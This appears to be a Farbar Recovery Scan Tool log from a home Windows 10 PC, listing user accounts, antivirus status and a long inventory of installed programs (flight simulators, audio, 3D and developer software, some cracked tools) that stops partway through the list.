Ran by SR (26-11-2019 14:03:35)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version:  - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version:  - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version:  - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version:  - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version:  - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version:  - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version:  - )
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version:  - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version:  - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version:  - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version:  - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version:  - )
LLH7X (HKLM-x32\...\LLH7X) (Version:  - )
LLH8X (HKLM-x32\...\LLH8X) (Version:  - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version:  - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version:  - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version:  - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version:  - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.222.1110.0002 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version:  - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
REAPER (x64) (HKLM\...\REAPER) (Version:  - )
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version:  - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
